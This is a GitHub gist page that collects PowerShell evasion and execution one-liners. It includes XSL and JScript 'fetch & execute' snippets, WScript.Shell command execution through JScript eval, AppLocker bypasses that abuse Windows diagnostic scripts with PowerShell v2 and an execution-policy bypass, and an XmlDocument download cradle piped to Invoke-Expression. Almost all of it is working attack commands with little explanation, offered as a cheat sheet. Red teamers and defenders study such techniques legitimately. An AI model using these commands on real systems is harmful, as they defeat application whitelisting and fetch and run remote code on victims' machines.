Skip to content

Instantly share code, notes, and snippets.

Forked from S3cur3Th1sSh1t/PowerShell.txt
Created July 14, 2024 18:37
Show Gist options
  • Save sharpicx/4e685ae2ab685ae8d4ea47fbfe391dfe to your computer and use it in GitHub Desktop.
Save sharpicx/4e685ae2ab685ae8d4ea47fbfe391dfe to your computer and use it in GitHub Desktop.
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### []
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('',$s,$r);$x.Transform('','z');del z;
### Powershell VBScript Assembly SCT "Fetch & Execute"
### []
### Powershell JScript Assembly SCT "Fetch & Execute"
### []
### Powershell JScript Assembly ActiveXObject Script Execution
### [@gabemarshall -]
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
### []
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
### Command Invocation w/ PowerShell Diagnostic Scripts
### []
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe
### PowerShell CL Download Cradle
### [@subtee -]
### [@HarmJ0y -]
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment